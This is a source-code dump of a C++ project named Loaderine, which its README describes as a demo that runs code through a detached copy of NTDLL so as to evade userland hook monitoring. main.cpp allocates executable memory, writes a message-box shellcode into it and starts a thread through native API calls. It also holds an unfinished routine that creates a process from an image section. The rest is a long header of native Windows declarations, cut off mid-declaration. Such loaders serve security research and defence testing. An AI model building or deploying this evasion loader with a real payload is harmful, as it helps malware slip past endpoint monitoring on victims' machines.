├── .gitmodules ├── CMakeLists.txt ├── README.md └── basic_ldr ├── CMakeLists.txt ├── main.cpp ├── ntddk.h ├── ntdll_detached.cpp ├── ntdll_detached.h ├── ntdll_types.h └── shellcodes.h /.gitmodules: -------------------------------------------------------------------------------- 1 | [submodule "libpeconv"] 2 | path = libpeconv 3 | url = https://github.com/hasherezade/libpeconv.git 4 | -------------------------------------------------------------------------------- /CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required ( VERSION 2.8 ) 2 | 3 | project ( loaderine ) 4 | 5 | # libs 6 | # modules: 7 | set ( M_PARSER "libpeconv/libpeconv" ) 8 | 9 | # modules paths: 10 | set (PECONV_DIR "${CMAKE_SOURCE_DIR}/${M_PARSER}" CACHE PATH "PEConv main path") 11 | add_subdirectory ( ${PECONV_DIR} ) 12 | set ( PECONV_LIB $ CACHE FILE "PEConvLib library path" ) 13 | 14 | # Add sub-directories 15 | # 16 | add_subdirectory ( basic_ldr ) 17 | 18 | #dependencies: 19 | add_dependencies( basic_ldr libpeconv ) 20 | 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Loaderine 2 | --- 3 | A demo that loads and runs a code using detached NTDLL (in order to evade userland hooks monitoring activity).
4 | WARNING: Experimental version. 5 | 6 | + uses library: 7 | https://github.com/hasherezade/libpeconv.git
8 | -------------------------------------------------------------------------------- /basic_ldr/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 2.8) 2 | 3 | project (basic_ldr) 4 | 5 | set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} /MT") 6 | 7 | #include libpeconv headers: 8 | include_directories ( ${PECONV_DIR}/include ) 9 | 10 | set (srcs 11 | main.cpp 12 | ntdll_detached.cpp 13 | ) 14 | 15 | set (hdrs 16 | ntddk.h 17 | ntdll_detached.h 18 | shellcodes.h 19 | ) 20 | 21 | add_executable ( ${PROJECT_NAME} ${hdrs} ${srcs} ) 22 | 23 | # link with libpeconv.lib 24 | target_link_libraries ( ${PROJECT_NAME} ${PECONV_LIB} ) 25 | -------------------------------------------------------------------------------- /basic_ldr/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | #include "ntdll_detached.h" 5 | #include "peconv.h" 6 | #include "shellcodes.h" 7 | 8 | HANDLE run_in_new_thread(HANDLE hProcess, LPVOID entry_point) 9 | { 10 | HANDLE hMyThread = NULL; 11 | NTSTATUS status = ntdll_NtCreateThreadEx(&hMyThread, 12 | THREAD_ALL_ACCESS, 13 | NULL, 14 | hProcess, 15 | (LPTHREAD_START_ROUTINE) entry_point, 16 | NULL, 17 | 0, 18 | 0, 19 | 0, 20 | 0, 21 | NULL 22 | ); 23 | if (status != STATUS_SUCCESS) { 24 | std::cerr << "[ERROR] NtCreateThreadEx failed, status : " << status << std::endl; 25 | return INVALID_HANDLE_VALUE; 26 | } 27 | return hMyThread; 28 | } 29 | 30 | HANDLE open_file(wchar_t* dummy_name) 31 | { 32 | HANDLE hFile = CreateFileW(dummy_name, 33 | GENERIC_WRITE | GENERIC_READ, 34 | 0, 35 | NULL, 36 | OPEN_EXISTING, 37 | FILE_ATTRIBUTE_NORMAL, 38 | NULL 39 | ); 40 | return hFile; 41 | } 42 | 43 | HANDLE create_process(HANDLE hFile) 44 | { 45 | HANDLE hSection = nullptr; 46 | NTSTATUS status = ntdll_NtCreateSection(&hSection, 47 | SECTION_ALL_ACCESS, 48 | NULL, 49 | 0, 50 | PAGE_READONLY, 51 | SEC_IMAGE, 52 | hFile 53 | ); 54 | if (status != STATUS_SUCCESS) { 55 | std::cerr << "NtCreateSection failed" << std::endl; 56 | return INVALID_HANDLE_VALUE; 57 | } 58 | HANDLE hProcess = nullptr; 59 | status = ntdll_NtCreateProcessEx( 60 | &hProcess, //ProcessHandle 61 | PROCESS_ALL_ACCESS, //DesiredAccess 62 | NULL, //ObjectAttributes 63 | ntdll_NtCurrentProcess(), //ParentProcess 64 | PS_INHERIT_HANDLES, //Flags 65 | hSection, //sectionHandle 66 | NULL, //DebugPort 67 | NULL, //ExceptionPort 68 | FALSE //InJob 69 | ); 70 | if (status != STATUS_SUCCESS) { 71 | std::cerr << "NtCreateProcessEx failed" << std::endl; 72 | return INVALID_HANDLE_VALUE; 73 | } 74 | return hProcess; 75 | } 76 | 77 | bool run_shellcode(HANDLE hProcess) 78 | { 79 | PVOID base_addr = 0; 80 | SIZE_T buffer_size = 0x1000; 81 | NTSTATUS status = ntdll_NtAllocateVirtualMemory( 82 | hProcess, 83 | &base_addr, 0, 84 | &buffer_size, 85 | MEM_COMMIT | MEM_RESERVE, 86 | PAGE_EXECUTE_READWRITE 87 | ); 88 | if (status != STATUS_SUCCESS) { 89 | std::cout << "Alloc failed!" << std::endl; 90 | return false; 91 | } 92 | std::cout << "Success" << std::endl; 93 | std::cout << base_addr << std::endl; 94 | PVOID shellcode_ptr = NULL; 95 | ULONG shellcode_size = 0; 96 | 97 | #ifndef _WIN64 98 | shellcode_ptr = messageBox32bit_sc; 99 | shellcode_size = sizeof(messageBox32bit_sc); 100 | #else 101 | shellcode_ptr = messageBox64bit_sc; 102 | shellcode_size = sizeof(messageBox64bit_sc); 103 | #endif 104 | 105 | status = ntdll_NtWriteVirtualMemory(hProcess, base_addr, shellcode_ptr, shellcode_size, nullptr); 106 | if (status != STATUS_SUCCESS) { 107 | std::cout << "Writing failed!" << std::endl; 108 | return false; 109 | } 110 | HANDLE hThread = run_in_new_thread(hProcess, base_addr); 111 | if (hThread != INVALID_HANDLE_VALUE) { 112 | std::cout << "Created Thread, id " << std::hex << GetThreadId(hThread) << std::endl; 113 | WaitForSingleObject(hThread, INFINITE); 114 | } 115 | return true; 116 | } 117 | 118 | bool run_new_process(wchar_t *path) 119 | { 120 | HANDLE file = open_file(path); 121 | if (file == INVALID_HANDLE_VALUE) { 122 | std::cerr << "Opening file failed!" << std::endl; 123 | return false; 124 | } 125 | HANDLE hProcess = create_process(file); 126 | if (hProcess == INVALID_HANDLE_VALUE) { 127 | std::cerr << "Creating process failed!" << std::endl; 128 | return false; 129 | } 130 | //TODO: setup process parameters 131 | //TODO2: run a thread inside the process 132 | return true; 133 | } 134 | 135 | int main(int argc, char *argv[]) 136 | { 137 | size_t ntdll_size = 0; 138 | HMODULE ntdll_mod = load_ntdll(ntdll_size); 139 | if (!init_ntdll_func(ntdll_mod)) { 140 | std::cerr << "Init failed!" << std:: endl; 141 | system("pause"); 142 | return -1; 143 | } 144 | 145 | if (run_shellcode(ntdll_NtCurrentProcess())) { 146 | std::cout <<"[+] Success" << std::endl; 147 | } 148 | system("pause"); 149 | return 0; 150 | } 151 | 152 | -------------------------------------------------------------------------------- /basic_ldr/ntddk.h: -------------------------------------------------------------------------------- 1 | #ifndef __NTDLL_H__ 2 | #define __NTDLL_H__ 3 | 4 | #ifdef __cplusplus 5 | extern "C" { 6 | #endif 7 | #include 8 | 9 | #ifdef _NTDDK_ 10 | #error This header cannot be compiled together with NTDDK 11 | #endif 12 | /* 13 | //Do not insert the library. Only definitions. 14 | 15 | #ifndef _NTDLL_SELF_ // Auto-insert the library 16 | #pragma comment(lib, "Ntdll.lib") 17 | #endif 18 | */ 19 | #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union 20 | 21 | #pragma warning(push) 22 | #pragma warning(disable:4005) 23 | #include 24 | #pragma warning(pop) 25 | 26 | //------------------------------------------------------------------------------ 27 | // Defines for NTSTATUS 28 | 29 | typedef long NTSTATUS; 30 | 31 | #ifndef NT_SUCCESS 32 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 33 | #endif 34 | 35 | #ifndef STATUS_SUCCESS 36 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 37 | #endif 38 | 39 | #ifndef STATUS_UNSUCCESSFUL 40 | #define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L) 41 | #endif 42 | 43 | #ifndef ASSERT 44 | #ifdef _DEBUG 45 | #define ASSERT(x) assert(x) 46 | #else 47 | #define ASSERT(x) /* x */ 48 | #endif 49 | #endif 50 | 51 | //------------------------------------------------------------------------------ 52 | // Structures 53 | 54 | typedef enum _EVENT_TYPE 55 | { 56 | NotificationEvent, 57 | SynchronizationEvent 58 | 59 | } EVENT_TYPE; 60 | 61 | // 62 | // ANSI strings are counted 8-bit character strings. If they are 63 | // NULL terminated, Length does not include trailing NULL. 64 | // 65 | 66 | #ifndef _NTSECAPI_ 67 | typedef struct _STRING 68 | { 69 | USHORT Length; 70 | USHORT MaximumLength; 71 | PCHAR Buffer; 72 | 73 | } STRING, *PSTRING; 74 | 75 | // 76 | // Unicode strings are counted 16-bit character strings. If they are 77 | // NULL terminated, Length does not include trailing NULL. 78 | // 79 | 80 | typedef struct _UNICODE_STRING 81 | { 82 | USHORT Length; 83 | USHORT MaximumLength; 84 | PWSTR Buffer; 85 | 86 | } UNICODE_STRING, *PUNICODE_STRING; 87 | #endif // _NTSECAPI_ 88 | 89 | typedef STRING ANSI_STRING; 90 | typedef PSTRING PANSI_STRING; 91 | 92 | typedef STRING OEM_STRING; 93 | typedef PSTRING POEM_STRING; 94 | typedef CONST STRING* PCOEM_STRING; 95 | 96 | typedef const UNICODE_STRING *PCUNICODE_STRING; 97 | 98 | #define UNICODE_NULL ((WCHAR)0) // winnt 99 | 100 | // 101 | // Valid values for the Attributes field 102 | // 103 | 104 | #ifndef OBJ_CASE_INSENSITIVE 105 | #define OBJ_INHERIT 0x00000002L 106 | #define OBJ_PERMANENT 0x00000010L 107 | #define OBJ_EXCLUSIVE 0x00000020L 108 | #define OBJ_CASE_INSENSITIVE 0x00000040L 109 | #define OBJ_OPENIF 0x00000080L 110 | #define OBJ_OPENLINK 0x00000100L 111 | #define OBJ_KERNEL_HANDLE 0x00000200L 112 | #define OBJ_FORCE_ACCESS_CHECK 0x00000400L 113 | #define OBJ_VALID_ATTRIBUTES 0x000007F2L 114 | 115 | // 116 | // Object Attributes structure 117 | // 118 | 119 | typedef struct _OBJECT_ATTRIBUTES 120 | { 121 | ULONG Length; 122 | HANDLE RootDirectory; 123 | PUNICODE_STRING ObjectName; 124 | ULONG Attributes; 125 | PVOID SecurityDescriptor; // Points to type SECURITY_DESCRIPTOR 126 | PVOID SecurityQualityOfService; // Points to type SECURITY_QUALITY_OF_SERVICE 127 | 128 | } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; 129 | #endif // OBJ_CASE_INSENSITIVE 130 | 131 | // 132 | // IO_STATUS_BLOCK 133 | // 134 | 135 | typedef struct _IO_STATUS_BLOCK 136 | { 137 | union 138 | { 139 | NTSTATUS Status; 140 | PVOID Pointer; 141 | }; 142 | 143 | ULONG_PTR Information; 144 | 145 | } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; 146 | 147 | // 148 | // ClientId 149 | // 150 | 151 | typedef struct _CLIENT_ID 152 | { 153 | HANDLE UniqueProcess; 154 | HANDLE UniqueThread; 155 | 156 | } CLIENT_ID, *PCLIENT_ID; 157 | 158 | 159 | // 160 | // CURDIR structure 161 | // 162 | 163 | typedef struct _CURDIR 164 | { 165 | UNICODE_STRING DosPath; 166 | HANDLE Handle; 167 | 168 | } CURDIR, *PCURDIR; 169 | 170 | 171 | //------------------------------------------------------------------------------ 172 | // Macros 173 | 174 | // INIT_UNICODE_STRING is a replacement of RtlInitUnicodeString 175 | #ifndef INIT_UNICODE_STRING 176 | #define INIT_UNICODE_STRING(us, wch) \ 177 | us.MaximumLength = (USHORT)sizeof(wch); \ 178 | us.Length = (USHORT)(wcslen(wch) * sizeof(WCHAR)); \ 179 | us.Buffer = wch 180 | #endif 181 | 182 | 183 | #ifndef InitializeObjectAttributes 184 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 185 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 186 | (p)->RootDirectory = r; \ 187 | (p)->Attributes = a; \ 188 | (p)->ObjectName = n; \ 189 | (p)->SecurityDescriptor = s; \ 190 | (p)->SecurityQualityOfService = NULL; \ 191 | } 192 | #endif 193 | 194 | 195 | #ifndef InitializePortHeader 196 | #define InitializeMessageHeader( ph, l, t ) { \ 197 | (ph)->TotalLength = (USHORT)(l); \ 198 | (ph)->DataLength = (USHORT)(l - sizeof(PORT_MESSAGE)); \ 199 | (ph)->Type = (USHORT)(t); \ 200 | (ph)->VirtualRangesOffset = 0; \ 201 | } 202 | #endif 203 | 204 | //----------------------------------------------------------------------------- 205 | // Image functions 206 | 207 | NTSYSAPI 208 | PVOID 209 | NTAPI 210 | RtlImageNtHeader ( 211 | IN PVOID BaseAddress 212 | ); 213 | 214 | NTSYSAPI 215 | PVOID 216 | NTAPI 217 | RtlImageDirectoryEntryToData ( 218 | IN PVOID Base, 219 | IN BOOLEAN MappedAsImage, 220 | IN USHORT DirectoryEntry, 221 | OUT PULONG Size 222 | ); 223 | 224 | //----------------------------------------------------------------------------- 225 | // Unicode string functions 226 | 227 | NTSYSAPI 228 | NTSTATUS 229 | NTAPI 230 | RtlStringFromGUID( 231 | IN REFGUID Guid, 232 | OUT PUNICODE_STRING GuidString 233 | ); 234 | 235 | 236 | NTSYSAPI 237 | VOID 238 | NTAPI 239 | RtlInitUnicodeString( 240 | PUNICODE_STRING DestinationString, 241 | PCWSTR SourceString 242 | ); 243 | 244 | 245 | NTSYSAPI 246 | BOOLEAN 247 | NTAPI 248 | RtlCreateUnicodeString( 249 | OUT PUNICODE_STRING DestinationString, 250 | IN PCWSTR SourceString 251 | ); 252 | 253 | 254 | NTSYSAPI 255 | BOOLEAN 256 | NTAPI 257 | RtlCreateUnicodeStringFromAsciiz( 258 | OUT PUNICODE_STRING Destination, 259 | IN PCSTR Source 260 | ); 261 | 262 | 263 | NTSYSAPI 264 | BOOLEAN 265 | NTAPI 266 | RtlPrefixUnicodeString ( 267 | IN PUNICODE_STRING String1, 268 | IN PUNICODE_STRING String2, 269 | IN BOOLEAN CaseInSensitive 270 | ); 271 | 272 | 273 | NTSYSAPI 274 | NTSTATUS 275 | NTAPI 276 | RtlDuplicateUnicodeString( 277 | IN BOOLEAN AllocateNew, 278 | IN PUNICODE_STRING SourceString, 279 | OUT PUNICODE_STRING TargetString 280 | ); 281 | 282 | 283 | NTSYSAPI 284 | NTSTATUS 285 | NTAPI 286 | RtlAppendUnicodeToString ( 287 | PUNICODE_STRING Destination, 288 | PCWSTR Source 289 | ); 290 | 291 | 292 | NTSYSAPI 293 | NTSTATUS 294 | NTAPI 295 | RtlAppendUnicodeStringToString( 296 | IN OUT PUNICODE_STRING Destination, 297 | IN PUNICODE_STRING Source 298 | ); 299 | 300 | 301 | NTSYSAPI 302 | NTSTATUS 303 | NTAPI 304 | RtlUnicodeStringToInteger ( 305 | IN PUNICODE_STRING String, 306 | IN ULONG Base OPTIONAL, 307 | OUT PULONG Value 308 | ); 309 | 310 | 311 | NTSYSAPI 312 | NTSTATUS 313 | NTAPI 314 | RtlIntegerToUnicodeString ( 315 | IN ULONG Value, 316 | IN ULONG Base OPTIONAL, 317 | IN OUT PUNICODE_STRING String 318 | ); 319 | 320 | 321 | NTSYSAPI 322 | NTSTATUS 323 | NTAPI 324 | RtlGUIDFromString( 325 | IN PUNICODE_STRING GuidString, 326 | OUT GUID *Guid 327 | ); 328 | 329 | 330 | NTSYSAPI 331 | LONG 332 | NTAPI 333 | RtlCompareUnicodeString ( 334 | IN PUNICODE_STRING String1, 335 | IN PUNICODE_STRING String2, 336 | IN BOOLEAN CaseInSensitive 337 | ); 338 | 339 | 340 | NTSYSAPI 341 | VOID 342 | NTAPI 343 | RtlCopyUnicodeString( 344 | OUT PUNICODE_STRING DestinationString, 345 | IN PUNICODE_STRING SourceString 346 | ); 347 | 348 | 349 | NTSYSAPI 350 | NTSTATUS 351 | NTAPI 352 | RtlUpcaseUnicodeString ( 353 | OUT PUNICODE_STRING DestinationString, 354 | IN PUNICODE_STRING SourceString, 355 | IN BOOLEAN AllocateDestinationString 356 | ); 357 | 358 | 359 | NTSYSAPI 360 | NTSTATUS 361 | NTAPI 362 | RtlDowncaseUnicodeString ( 363 | OUT PUNICODE_STRING DestinationString, 364 | IN PUNICODE_STRING SourceString, 365 | IN BOOLEAN AllocateDestinationString 366 | ); 367 | 368 | 369 | NTSYSAPI 370 | BOOLEAN 371 | NTAPI 372 | RtlEqualUnicodeString ( 373 | IN PUNICODE_STRING String1, 374 | IN PUNICODE_STRING String2, 375 | IN BOOLEAN CaseInSensitive 376 | ); 377 | 378 | 379 | NTSYSAPI 380 | VOID 381 | NTAPI 382 | RtlFreeUnicodeString( 383 | IN PUNICODE_STRING UnicodeString 384 | ); 385 | 386 | 387 | NTSYSAPI 388 | NTSTATUS 389 | NTAPI 390 | RtlAnsiStringToUnicodeString ( 391 | OUT PUNICODE_STRING DestinationString, 392 | IN PANSI_STRING SourceString, 393 | IN BOOLEAN AllocateDestinationString 394 | ); 395 | 396 | 397 | NTSYSAPI 398 | NTSTATUS 399 | NTAPI 400 | RtlUnicodeStringToAnsiString ( 401 | OUT PANSI_STRING DestinationString, 402 | IN PUNICODE_STRING SourceString, 403 | IN BOOLEAN AllocateDestinationString 404 | ); 405 | 406 | 407 | NTSYSAPI 408 | VOID 409 | NTAPI 410 | RtlInitAnsiString ( 411 | OUT PANSI_STRING DestinationString, 412 | IN PCHAR SourceString 413 | ); 414 | 415 | 416 | NTSYSAPI 417 | VOID 418 | NTAPI 419 | RtlFreeAnsiString ( 420 | IN PANSI_STRING AnsiString 421 | ); 422 | 423 | 424 | NTSYSAPI 425 | NTSTATUS 426 | NTAPI 427 | RtlFormatCurrentUserKeyPath( 428 | OUT PUNICODE_STRING CurrentUserKeyPath 429 | ); 430 | 431 | 432 | NTSYSAPI 433 | VOID 434 | NTAPI 435 | RtlRaiseStatus ( 436 | IN NTSTATUS Status 437 | ); 438 | 439 | 440 | NTSYSAPI 441 | VOID 442 | NTAPI 443 | DbgBreakPoint( 444 | VOID 445 | ); 446 | 447 | 448 | NTSYSAPI 449 | ULONG 450 | _cdecl 451 | DbgPrint ( 452 | PCH Format, 453 | ... 454 | ); 455 | 456 | 457 | NTSYSAPI 458 | ULONG 459 | NTAPI 460 | RtlRandom( 461 | IN OUT PULONG Seed 462 | ); 463 | 464 | //----------------------------------------------------------------------------- 465 | // Critical section functions 466 | 467 | NTSYSAPI 468 | NTSTATUS 469 | NTAPI 470 | RtlInitializeCriticalSection( 471 | IN PRTL_CRITICAL_SECTION CriticalSection 472 | ); 473 | 474 | 475 | NTSYSAPI 476 | BOOL 477 | NTAPI 478 | RtlTryEnterCriticalSection( 479 | IN PRTL_CRITICAL_SECTION CriticalSection 480 | ); 481 | 482 | 483 | NTSYSAPI 484 | NTSTATUS 485 | NTAPI 486 | RtlEnterCriticalSection( 487 | IN PRTL_CRITICAL_SECTION CriticalSection 488 | ); 489 | 490 | 491 | NTSYSAPI 492 | NTSTATUS 493 | NTAPI 494 | RtlLeaveCriticalSection( 495 | IN PRTL_CRITICAL_SECTION CriticalSection 496 | ); 497 | 498 | 499 | NTSYSAPI 500 | NTSTATUS 501 | NTAPI 502 | RtlDeleteCriticalSection( 503 | IN PRTL_CRITICAL_SECTION CriticalSection 504 | ); 505 | 506 | //----------------------------------------------------------------------------- 507 | // Object functions 508 | 509 | // 510 | // Object Manager Directory Specific Access Rights. 511 | // 512 | 513 | #ifndef DIRECTORY_QUERY 514 | #define DIRECTORY_QUERY (0x0001) 515 | #define DIRECTORY_TRAVERSE (0x0002) 516 | #define DIRECTORY_CREATE_OBJECT (0x0004) 517 | #define DIRECTORY_CREATE_SUBDIRECTORY (0x0008) 518 | #define DIRECTORY_ALL_ACCESS (STANDARD_RIGHTS_REQUIRED | 0xF) 519 | #endif 520 | 521 | typedef enum _POOL_TYPE { 522 | NonPagedPool, 523 | PagedPool, 524 | NonPagedPoolMustSucceed, 525 | DontUseThisType, 526 | NonPagedPoolCacheAligned, 527 | PagedPoolCacheAligned, 528 | NonPagedPoolCacheAlignedMustS, 529 | MaxPoolType 530 | } POOL_TYPE; 531 | 532 | 533 | // 534 | // For NtQueryObject 535 | // 536 | 537 | typedef enum _OBJECT_INFORMATION_CLASS { 538 | ObjectBasicInformation, // = 0 539 | ObjectNameInformation, // = 1 540 | ObjectTypeInformation, // = 2 541 | ObjectTypesInformation, // = 3 //object handle is ignored 542 | ObjectHandleFlagInformation // = 4 543 | } OBJECT_INFORMATION_CLASS; 544 | 545 | // 546 | // NtQueryObject uses ObjectBasicInformation 547 | // 548 | 549 | typedef struct _OBJECT_BASIC_INFORMATION { 550 | ULONG Attributes; 551 | ACCESS_MASK GrantedAccess; 552 | ULONG HandleCount; 553 | ULONG PointerCount; 554 | ULONG PagedPoolCharge; 555 | ULONG NonPagedPoolCharge; 556 | ULONG Reserved[3]; 557 | ULONG NameInfoSize; 558 | ULONG TypeInfoSize; 559 | ULONG SecurityDescriptorSize; 560 | LARGE_INTEGER CreationTime; 561 | } OBJECT_BASIC_INFORMATION, *POBJECT_BASIC_INFORMATION; 562 | 563 | // 564 | // NtQueryObject uses ObjectNameInformation 565 | // 566 | 567 | typedef struct _OBJECT_NAME_INFORMATION { 568 | UNICODE_STRING Name; 569 | } OBJECT_NAME_INFORMATION, *POBJECT_NAME_INFORMATION; 570 | 571 | // 572 | // NtQueryObject uses ObjectTypeInformation 573 | // 574 | 575 | typedef struct _OBJECT_TYPE_INFORMATION { 576 | UNICODE_STRING TypeName; 577 | ULONG TotalNumberOfObjects; 578 | ULONG TotalNumberOfHandles; 579 | ULONG TotalPagedPoolUsage; 580 | ULONG TotalNonPagedPoolUsage; 581 | ULONG TotalNamePoolUsage; 582 | ULONG TotalHandleTableUsage; 583 | ULONG HighWaterNumberOfObjects; 584 | ULONG HighWaterNumberOfHandles; 585 | ULONG HighWaterPagedPoolUsage; 586 | ULONG HighWaterNonPagedPoolUsage; 587 | ULONG HighWaterNamePoolUsage; 588 | ULONG HighWaterHandleTableUsage; 589 | ULONG InvalidAttributes; 590 | GENERIC_MAPPING GenericMapping; 591 | ULONG ValidAccessMask; 592 | BOOLEAN SecurityRequired; 593 | BOOLEAN MaintainHandleCount; 594 | POOL_TYPE PoolType; 595 | ULONG DefaultPagedPoolCharge; 596 | ULONG DefaultNonPagedPoolCharge; 597 | } OBJECT_TYPE_INFORMATION, *POBJECT_TYPE_INFORMATION; 598 | 599 | // 600 | // NtQueryObject uses ObjectHandleFlagInformation 601 | // NtSetInformationObject uses ObjectHandleFlagInformation 602 | // 603 | 604 | typedef struct _OBJECT_HANDLE_FLAG_INFORMATION { 605 | BOOLEAN Inherit; 606 | BOOLEAN ProtectFromClose; 607 | } OBJECT_HANDLE_FLAG_INFORMATION, *POBJECT_HANDLE_FLAG_INFORMATION; 608 | 609 | // 610 | // NtQueryDirectoryObject uses this type 611 | // 612 | 613 | typedef struct _OBJECT_DIRECTORY_INFORMATION { 614 | UNICODE_STRING Name; 615 | UNICODE_STRING TypeName; 616 | } OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION; 617 | 618 | 619 | NTSYSAPI 620 | NTSTATUS 621 | NTAPI 622 | NtOpenDirectoryObject( 623 | OUT PHANDLE DirectoryHandle, 624 | IN ACCESS_MASK DesiredAccess, 625 | IN POBJECT_ATTRIBUTES ObjectAttributes 626 | ); 627 | 628 | 629 | NTSYSAPI 630 | NTSTATUS 631 | NTAPI 632 | NtQueryDirectoryObject( 633 | IN HANDLE DirectoryHandle, 634 | OUT PVOID Buffer, 635 | IN ULONG Length, 636 | IN BOOLEAN ReturnSingleEntry, 637 | IN BOOLEAN RestartScan, 638 | IN OUT PULONG Context, 639 | OUT PULONG ReturnLength OPTIONAL 640 | ); 641 | 642 | 643 | NTSYSAPI 644 | NTSTATUS 645 | NTAPI 646 | NtQueryObject ( 647 | IN HANDLE ObjectHandle, 648 | IN OBJECT_INFORMATION_CLASS ObjectInformationClass, 649 | OUT PVOID ObjectInformation, 650 | IN ULONG Length, 651 | OUT PULONG ResultLength OPTIONAL 652 | ); 653 | 654 | 655 | NTSYSAPI 656 | NTSTATUS 657 | NTAPI 658 | NtSetInformationObject ( 659 | IN HANDLE ObjectHandle, 660 | IN OBJECT_INFORMATION_CLASS ObjectInformationClass, 661 | IN PVOID ObjectInformation, 662 | IN ULONG Length 663 | ); 664 | 665 | 666 | NTSYSAPI 667 | NTSTATUS 668 | NTAPI 669 | NtDuplicateObject ( 670 | IN HANDLE SourceProcessHandle, 671 | IN HANDLE SourceHandle, 672 | IN HANDLE TargetProcessHandle OPTIONAL, 673 | OUT PHANDLE TargetHandle OPTIONAL, 674 | IN ACCESS_MASK DesiredAccess, 675 | IN ULONG HandleAttributes, 676 | IN ULONG Options 677 | ); 678 | 679 | 680 | NTSYSAPI 681 | NTSTATUS 682 | NTAPI 683 | NtQuerySecurityObject ( 684 | IN HANDLE ObjectHandle, 685 | IN SECURITY_INFORMATION SecurityInformation, 686 | OUT PSECURITY_DESCRIPTOR SecurityDescriptor, 687 | IN ULONG DescriptorLength, 688 | OUT PULONG ReturnLength 689 | ); 690 | 691 | 692 | NTSYSAPI 693 | NTSTATUS 694 | NTAPI 695 | NtSetSecurityObject ( 696 | IN HANDLE ObjectHandle, 697 | IN SECURITY_INFORMATION SecurityInformation, 698 | IN PSECURITY_DESCRIPTOR SecurityDescriptor 699 | ); 700 | 701 | 702 | //----------------------------------------------------------------------------- 703 | // Handle table RTL functions 704 | 705 | #define LEVEL_HANDLE_ID 0x74000000 706 | #define LEVEL_HANDLE_ID_MASK 0xFF000000 707 | #define LEVEL_HANDLE_INDEX_MASK 0x00FFFFFF 708 | 709 | typedef enum _RTL_GENERIC_COMPARE_RESULTS { 710 | GenericLessThan, 711 | GenericGreaterThan, 712 | GenericEqual 713 | } RTL_GENERIC_COMPARE_RESULTS; 714 | 715 | 716 | typedef struct _RTL_SPLAY_LINKS 717 | { 718 | struct _RTL_SPLAY_LINKS *Parent; 719 | struct _RTL_SPLAY_LINKS *LeftChild; 720 | struct _RTL_SPLAY_LINKS *RightChild; 721 | } RTL_SPLAY_LINKS, *PRTL_SPLAY_LINKS; 722 | 723 | 724 | struct _RTL_GENERIC_TABLE; 725 | 726 | typedef 727 | RTL_GENERIC_COMPARE_RESULTS 728 | (NTAPI * PRTL_GENERIC_COMPARE_ROUTINE) ( 729 | struct _RTL_GENERIC_TABLE *Table, 730 | PVOID FirstStruct, 731 | PVOID SecondStruct 732 | ); 733 | 734 | typedef 735 | PVOID 736 | (NTAPI *PRTL_GENERIC_ALLOCATE_ROUTINE) ( 737 | struct _RTL_GENERIC_TABLE *Table, 738 | ULONG ByteSize 739 | ); 740 | 741 | typedef 742 | VOID 743 | (NTAPI *PRTL_GENERIC_FREE_ROUTINE) ( 744 | struct _RTL_GENERIC_TABLE *Table, 745 | PVOID Buffer 746 | ); 747 | 748 | 749 | typedef struct _RTL_GENERIC_TABLE { 750 | PRTL_SPLAY_LINKS TableRoot; 751 | LIST_ENTRY InsertOrderList; 752 | PLIST_ENTRY OrderedPointer; 753 | ULONG WhichOrderedElement; 754 | ULONG NumberGenericTableElements; 755 | PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine; 756 | PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine; 757 | PRTL_GENERIC_FREE_ROUTINE FreeRoutine; 758 | PVOID TableContext; 759 | } RTL_GENERIC_TABLE, *PRTL_GENERIC_TABLE; 760 | 761 | 762 | typedef struct _RTL_HANDLE_TABLE_ENTRY 763 | { 764 | struct _RTL_HANDLE_TABLE_ENTRY *Next; /* pointer to next free handle */ 765 | PVOID Object; 766 | 767 | } RTL_HANDLE_TABLE_ENTRY, *PRTL_HANDLE_TABLE_ENTRY; 768 | 769 | 770 | typedef struct _RTL_HANDLE_TABLE 771 | { 772 | ULONG MaximumNumberOfHandles; 773 | ULONG SizeOfHandleTableEntry; 774 | ULONG Unknown01; 775 | ULONG Unknown02; 776 | PRTL_HANDLE_TABLE_ENTRY FreeHandles; 777 | PRTL_HANDLE_TABLE_ENTRY CommittedHandles; 778 | PRTL_HANDLE_TABLE_ENTRY UnCommittedHandles; 779 | PRTL_HANDLE_TABLE_ENTRY MaxReservedHandles; 780 | } RTL_HANDLE_TABLE, *PRTL_HANDLE_TABLE; 781 | 782 | 783 | NTSYSAPI 784 | VOID 785 | NTAPI 786 | RtlInitializeGenericTable ( 787 | IN PRTL_GENERIC_TABLE Table, 788 | IN PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine, 789 | IN PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine, 790 | IN PRTL_GENERIC_FREE_ROUTINE FreeRoutine, 791 | IN PVOID TableContext 792 | ); 793 | 794 | 795 | NTSYSAPI 796 | VOID 797 | NTAPI 798 | RtlInitializeHandleTable( 799 | IN ULONG MaximumNumberOfHandles, 800 | IN ULONG SizeOfHandleTableEntry, 801 | OUT PRTL_HANDLE_TABLE HandleTable 802 | ); 803 | 804 | 805 | NTSYSAPI 806 | PRTL_HANDLE_TABLE_ENTRY 807 | NTAPI 808 | RtlAllocateHandle( 809 | IN PRTL_HANDLE_TABLE HandleTable, 810 | OUT PULONG HandleIndex OPTIONAL 811 | ); 812 | 813 | 814 | NTSYSAPI 815 | BOOLEAN 816 | NTAPI 817 | RtlFreeHandle( 818 | IN PRTL_HANDLE_TABLE HandleTable, 819 | IN PRTL_HANDLE_TABLE_ENTRY Handle 820 | ); 821 | 822 | 823 | NTSYSAPI 824 | BOOLEAN 825 | NTAPI 826 | RtlIsValidIndexHandle( 827 | IN PRTL_HANDLE_TABLE HandleTable, 828 | IN ULONG HandleIndex, 829 | OUT 